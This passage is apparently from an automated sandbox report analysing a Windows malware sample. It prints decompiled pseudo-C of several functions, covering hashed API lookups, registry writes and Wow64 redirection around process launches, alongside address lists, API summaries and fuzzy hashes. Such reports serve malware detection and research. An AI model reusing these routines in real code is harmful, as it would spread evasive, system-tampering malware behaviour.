						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x52fa290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E052F50CA(_t76);
				goto L12;
			}



















                                0x052f51b1
                                0x052f51b1
                                0x052f51bf
                                0x052f51c8
                                0x052f51cb
                                0x052f52dd
                                0x052f52e4
                                0x052f52e4
                                0x052f51da
                                0x052f51e2
                                0x052f51e7
                                0x052f51ea
                                0x052f51ff
                                0x052f5205
                                0x052f5206
                                0x052f5209
                                0x052f520f
                                0x052f5212
                                0x052f5217
                                0x052f521f
                                0x052f5226
                                0x052f522d
                                0x052f5230
                                0x052f52c4
                                0x052f5236
                                0x052f5236
                                0x052f523b
                                0x052f5242
                                0x052f5256
                                0x052f525a
                                0x052f52ab
                                0x052f525c
                                0x052f525c
                                0x052f5263
                                0x052f526a
                                0x052f5282
                                0x052f5288
                                0x052f528c
                                0x052f52a6
                                0x052f528e
                                0x052f5297
                                0x052f529c
                                0x052f529c
                                0x052f528c
                                0x052f52bc
                                0x052f52bc
                                0x052f5230
                                0x052f52cb
                                0x052f52d4
                                0x052f52d8
                                0x00000000

                                APIs
                                  • Part of subcall function 052F4F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,052F51C4,?,?,?,?,00000000,00000000), ref: 052F4F7F
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 052F4FA1
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 052F4FB7
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052F4FCD
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052F4FE3
                                  • Part of subcall function 052F4F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052F4FF9
                                • memset.NTDLL ref: 052F5212
                                  • Part of subcall function 052F6343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,052F522B,73797325), ref: 052F6354
                                  • Part of subcall function 052F6343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 052F636E
                                • GetModuleHandleA.KERNEL32(4E52454B,07458D18,73797325), ref: 052F5249
                                • GetProcAddress.KERNEL32(00000000), ref: 052F5250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 052F526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 052F5288
                                • CloseHandle.KERNEL32(00000000), ref: 052F5297
                                • CloseHandle.KERNEL32(?), ref: 052F529C
                                • GetLastError.KERNEL32 ref: 052F52A0
                                • HeapFree.KERNEL32(00000000,?), ref: 052F52BC
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: 2588598a18a4145a7ecdbb4a83a2af3858d2976bd7deaa3932d303573ca18613
                                • Instruction ID: 6de45abc2ebb277df5be8e847fee2a0577b8bdeb12c5fc4882a7b88470d72c56
                                • Opcode Fuzzy Hash: 2588598a18a4145a7ecdbb4a83a2af3858d2976bd7deaa3932d303573ca18613
                                • Instruction Fuzzy Hash: F1315771A20219BFDB119BE4EC4CA9EBFB9FF08310F104165F209A3151D771AA85CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E052F624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x52fa2d4; // 0x215d5a8
				_t1 = _t9 + 0x52fb60c; // 0x253d7325
				_t36 = 0;
				_t28 = E052F278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x7459631
					_t40 = E052F6837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t36 = E052F49FE(_t33, _t34, _t40, _a8);
						E052F50CA(_t40);
						_t42 = E052F7565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E052F50CA(_t36);
							_t36 = _t42;
						}
						_t43 = E052F52E5(_t36, _t33);
						if(_t43 != 0) {
							E052F50CA(_t36);
							_t36 = _t43;
						}
					}
					E052F50CA(_t28);
				}
				return _t36;
			}















                                0x052f624d
                                0x052f6250
                                0x052f6251
                                0x052f6258
                                0x052f625f
                                0x052f6266
                                0x052f626a
                                0x052f6271
                                0x052f6278
                                0x052f627d
                                0x052f6285
                                0x052f628f
                                0x052f6293
                                0x052f6297
                                0x052f629d
                                0x052f62a2
                                0x052f62b2
                                0x052f62b4
                                0x052f62cb
                                0x052f62cf
                                0x052f62d2
                                0x052f62d7
                                0x052f62d7
                                0x052f62e0
                                0x052f62e4
                                0x052f62e7
                                0x052f62ec
                                0x052f62ec
                                0x052f62e4
                                0x052f62ef
                                0x052f62f4
                                0x052f62fa

                                APIs
                                  • Part of subcall function 052F278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,052F6266,253D7325,00000000,00000000,?,00000000,052F70D9), ref: 052F27F3
                                  • Part of subcall function 052F278C: sprintf.NTDLL ref: 052F2814
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6278
                                • lstrlen.KERNEL32(00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6280
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • strcpy.NTDLL ref: 052F6297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F62A2
                                  • Part of subcall function 052F49FE: lstrlen.KERNEL32(00000000,00000000,052F70D9,00000000,?,052F62B1,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F4A0F
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F62BF
                                  • Part of subcall function 052F7565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,052F62CB,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F756F
                                  • Part of subcall function 052F7565: _snprintf.NTDLL ref: 052F75CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 76d67f855574cb7b465f64cfe82c3d5ecc8339a4e690185fdf6249a2c3c0b450
                                • Instruction ID: 0049a669d3861e181c8a6fbb7e0527cc1aae3500f55f62c1f1f2fd599299c432
                                • Opcode Fuzzy Hash: 76d67f855574cb7b465f64cfe82c3d5ecc8339a4e690185fdf6249a2c3c0b450
                                • Instruction Fuzzy Hash: D811A033B212266747126BA8BC8CCAFBAADEE895603054139FB05A7200DE74D80697E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F2902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 052F295E
                                • SysAllocString.OLEAUT32(0070006F), ref: 052F2972
                                • SysAllocString.OLEAUT32(00000000), ref: 052F2984
                                • SysFreeString.OLEAUT32(00000000), ref: 052F29E8
                                • SysFreeString.OLEAUT32(00000000), ref: 052F29F7
                                • SysFreeString.OLEAUT32(00000000), ref: 052F2A02
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 77a4b754670c69d68869ff898de4f8e53f7cf3f5ce60e42f8fb2e15ca9305059
                                • Instruction ID: 1b5afe1a103310431edd1a816c04921a69e9a9c13017a78af82693fc2521187d
                                • Opcode Fuzzy Hash: 77a4b754670c69d68869ff898de4f8e53f7cf3f5ce60e42f8fb2e15ca9305059
                                • Instruction Fuzzy Hash: A0318B36910609EFDB01DFA8E849A9EBBB6BF49310F104435EE15EB110DB71A906CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F4F5A, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E052F4F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E052F6837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x52fa2d4; // 0x215d5a8
					_t1 = _t23 + 0x52fb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x52fa2d4; // 0x215d5a8
					_t2 = _t26 + 0x52fb792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E052F50CA(_t54);
					} else {
						_t30 =  *0x52fa2d4; // 0x215d5a8
						_t5 = _t30 + 0x52fb77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x52fa2d4; // 0x215d5a8
							_t7 = _t33 + 0x52fb74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x52fa2d4; // 0x215d5a8
								_t9 = _t36 + 0x52fb72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x52fa2d4; // 0x215d5a8
									_t11 = _t39 + 0x52fb7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E052F4248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x052f4f69
                                0x052f4f6d
                                0x052f502f
                                0x052f4f73
                                0x052f4f73
                                0x052f4f78
                                0x052f4f8b
                                0x052f4f8d
                                0x052f4f92
                                0x052f4f9a
                                0x052f4fa1
                                0x052f4fa5
                                0x052f4fa8
                                0x052f5027
                                0x052f5028
                                0x052f4faa
                                0x052f4faa
                                0x052f4faf
                                0x052f4fb7
                                0x052f4fbb
                                0x052f4fbe
                                0x00000000
                                0x052f4fc0
                                0x052f4fc0
                                0x052f4fc5
                                0x052f4fcd
                                0x052f4fd1
                                0x052f4fd4
                                0x00000000
                                0x052f4fd6
                                0x052f4fd6
                                0x052f4fdb
                                0x052f4fe3
                                0x052f4fe7
                                0x052f4fea
                                0x00000000
                                0x052f4fec
                                0x052f4fec
                                0x052f4ff1
                                0x052f4ff9
                                0x052f4ffd
                                0x052f5000
                                0x00000000
                                0x052f5002
                                0x052f5008
                                0x052f500d
                                0x052f5014
                                0x052f501b
                                0x052f501e
                                0x00000000
                                0x052f5020
                                0x052f5023
                                0x052f5023
                                0x052f501e
                                0x052f5000
                                0x052f4fea
                                0x052f4fd4
                                0x052f4fbe
                                0x052f4fa8
                                0x052f503d

                                APIs
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,052F51C4,?,?,?,?,00000000,00000000), ref: 052F4F7F
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 052F4FA1
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 052F4FB7
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052F4FCD
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052F4FE3
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052F4FF9
                                  • Part of subcall function 052F4248: memset.NTDLL ref: 052F42C7
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 54f1922ac37054008924feb0f43cd3c82a3e91142564eb9887cc7c6f2b8af156
                                • Instruction ID: a581f6be211b832258a1fdf01eb47cafb1b835558065ac4cf2a62eeb0a5bf1ba
                                • Opcode Fuzzy Hash: 54f1922ac37054008924feb0f43cd3c82a3e91142564eb9887cc7c6f2b8af156
                                • Instruction Fuzzy Hash: 70213CB172024AAFE750DF69F949E6ABBECEF09254B00403AF50AC7641D735E905CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F1D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E052F1D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x52fa38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E052F4AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E052F7702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E052F50CA(_a8);
						goto L29;
					}
					_t64 =  *0x52fa2cc; // 0x7459c98
					_t16 = _t64 + 0xc; // 0x7459d8c
					_t65 = E052F4AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d052f90
						if(E052F5F2A(_t97,  *_t33, _t91, _a8,  *0x52fa384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x52fa2d4; // 0x215d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x52fb9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x52fb9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E052F5927(_t69,  *0x52fa384,  *0x52fa388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x52fa2d4; // 0x215d5a8
									_t44 = _t71 + 0x52fb86a; // 0x74666f53
									_t73 = E052F4AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d052f90
										E052F1F7A( *_t47, _t91, _a8,  *0x52fa388, _a24);
										_t49 = _t101 + 0x10; // 0x3d052f90
										E052F1F7A( *_t49, _t91, _t99,  *0x52fa380, _a16);
										E052F50CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d052f90
									E052F1F7A( *_t40, _t91, _a8,  *0x52fa388, _a24);
									_t43 = _t101 + 0x10; // 0x3d052f90
									E052F1F7A( *_t43, _t91, _a8,  *0x52fa380, _a16);
								}
								if( *_t101 != 0) {
									E052F50CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d052f90
					_t81 = E052F6A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d052f90
							E052F5F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E052F50CA(_t100);
						_t98 = _a16;
					}
					E052F50CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E052F77A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x52fa38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                0x052f1d57
                                0x052f1d60
                                0x052f1d67
                                0x052f1d6c
                                0x052f1dd9
                                0x052f1ddf
                                0x052f1de4
                                0x052f1deb
                                0x052f1df2
                                0x052f1df5
                                0x052f1f60
                                0x052f1f67
                                0x052f1f67
                                0x052f1f6c
                                0x052f1f6e
                                0x052f1f6e
                                0x052f1f77
                                0x052f1f77
                                0x052f1dfb
                                0x052f1e07
                                0x052f1f56
                                0x052f1f59
                                0x00000000
                                0x052f1f59
                                0x052f1e0d
                                0x052f1e12
                                0x052f1e15
                                0x052f1e1c
                                0x052f1e1f
                                0x052f1e68
                                0x052f1e68
                                0x052f1e7b
                                0x052f1e85
                                0x052f1e8d
                                0x052f1e92
                                0x052f1e9c
                                0x052f1e9c
                                0x052f1e94
                                0x052f1e94
                                0x052f1e94
                                0x052f1e94
                                0x052f1ebe
                                0x052f1ec6
                                0x052f1ef4
                                0x052f1ef9
                                0x052f1f00
                                0x052f1f05
                                0x052f1f09
                                0x052f1f3b
                                0x052f1f0b
                                0x052f1f18
                                0x052f1f1b
                                0x052f1f2b
                                0x052f1f2e
                                0x052f1f34
                                0x052f1f34
                                0x052f1ec8
                                0x052f1ed5
                                0x052f1ed8
                                0x052f1eea
                                0x052f1eed
                                0x052f1eed
                                0x052f1f45
                                0x052f1f51
                                0x052f1f47
                                0x052f1f4a
                                0x052f1f4a
                                0x052f1f45
                                0x052f1ebe
                                0x00000000
                                0x052f1e85
                                0x052f1e2e
                                0x052f1e31
                                0x052f1e38
                                0x052f1e3e
                                0x052f1e41
                                0x052f1e43
                                0x052f1e4f
                                0x052f1e52
                                0x052f1e52
                                0x052f1e58
                                0x052f1e5d
                                0x052f1e5d
                                0x052f1e63
                                0x00000000
                                0x052f1e63
                                0x052f1d71
                                0x00000000
                                0x052f1d98
                                0x052f1d98
                                0x052f1da4
                                0x052f1db7
                                0x052f1dbd
                                0x052f1dc5
                                0x00000000
                                0x052f1dc5

                                APIs
                                • StrChrA.SHLWAPI(052F30C2,0000005F,00000000,00000000,00000104), ref: 052F1D8A
                                • lstrcpy.KERNEL32(?,?), ref: 052F1DB7
                                  • Part of subcall function 052F4AA6: lstrlen.KERNEL32(?,00000000,07459C98,74ECC740,052F13D0,07459E9D,052F55DE,052F55DE,?,052F55DE,?,63699BC3,E8FA7DD7,00000000), ref: 052F4AAD
                                  • Part of subcall function 052F4AA6: mbstowcs.NTDLL ref: 052F4AD6
                                  • Part of subcall function 052F4AA6: memset.NTDLL ref: 052F4AE8
                                  • Part of subcall function 052F1F7A: lstrlenW.KERNEL32(?,?,?,052F1F20,3D052F90,80000002,052F30C2,052F4106,74666F53,4D4C4B48,052F4106,?,3D052F90,80000002,052F30C2,?), ref: 052F1F9F
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 052F1DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: d5e5484891a9eda0abcdf03bda8bc4a469780bbf14842ac67b87dbb0ddcf6310
                                • Instruction ID: 926c2fe204fea5628fe4a3cf24b9c60e84eaf6ed92290f1f51930563ddc93f3d
                                • Opcode Fuzzy Hash: d5e5484891a9eda0abcdf03bda8bc4a469780bbf14842ac67b87dbb0ddcf6310
                                • Instruction Fuzzy Hash: 8B511A7222020AFFDF219F60FD49EAABBBAFF04310F404535FA1992160D7359925DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F6BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                Download Yara Rule
                                C-Code - Quality: 32%
                                			E052F6BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E052F2902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x52fa2d4; // 0x215d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x52fb4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x52fb8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x52fa100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                0x052f6be1
                                0x052f6be8
                                0x052f6bec
                                0x052f6bf1
                                0x052f6bf8
                                0x052f6bfb
                                0x052f6c05
                                0x052f6c0a
                                0x052f6c16
                                0x052f6c1d
                                0x052f6c27
                                0x052f6c27
                                0x052f6c1f
                                0x052f6c1f
                                0x052f6c1f
                                0x052f6c1f
                                0x052f6c2d
                                0x052f6c30
                                0x052f6c38
                                0x052f6c3b
                                0x052f6c3e
                                0x052f6c41
                                0x052f6c46
                                0x052f6c4f
                                0x052f6c5c
                                0x052f6c51
                                0x052f6c57
                                0x052f6c57
                                0x052f6c62
                                0x052f6c62
                                0x052f6c6a

                                APIs
                                  • Part of subcall function 052F2902: SysAllocString.OLEAUT32(?), ref: 052F295E
                                  • Part of subcall function 052F2902: SysAllocString.OLEAUT32(0070006F), ref: 052F2972
                                  • Part of subcall function 052F2902: SysAllocString.OLEAUT32(00000000), ref: 052F2984
                                  • Part of subcall function 052F2902: SysFreeString.OLEAUT32(00000000), ref: 052F29E8
                                • memset.NTDLL ref: 052F6C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 052F6C41
                                • GetLastError.KERNEL32 ref: 052F6C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 052F6C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: e0574eb05400f21409115a6b9f73a626ef4b2c23513a486053c32c409b40ee8d
                                • Instruction ID: b6860c5ccfc09fddb918ac4ce52b212babfed0317c3f901f178edf9cb002b6a7
                                • Opcode Fuzzy Hash: e0574eb05400f21409115a6b9f73a626ef4b2c23513a486053c32c409b40ee8d
                                • Instruction Fuzzy Hash: 6111FE71910218ABDB00DFA5F88DB99BBB8EF08754F008426FA09E7180D774A544CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F39C5, Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(052F4A23,052F70D9,00000010,?,?,?,052F4A23,00000001,052F70D9,00000000,?,052F62B1,00000000,052F70D9,?,00000000), ref: 052F3A16
                                • memcpy.NTDLL(00000000,00000000,07459630,00000010), ref: 052F3AA9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 052F3B01
                                • GetLastError.KERNEL32 ref: 052F3B33
                                • GetLastError.KERNEL32 ref: 052F3B47
                                • GetLastError.KERNEL32(?,?,?,052F4A23,00000001,052F70D9,00000000,?,052F62B1,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F3B5C
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: feb8ee493680d488746abd89d70a06687d9ab9cec7c797df970922d55ff73142
                                • Instruction ID: 920c41504d289b82b368a70f12ff1d46cdbd79207d627724bebb0bed023a9854
                                • Opcode Fuzzy Hash: feb8ee493680d488746abd89d70a06687d9ab9cec7c797df970922d55ff73142
                                • Instruction Fuzzy Hash: C5513B71924209FFDF10DFA5E889AAEBBB9FF14350F008439FA05E6240D7719A549B61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F2A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
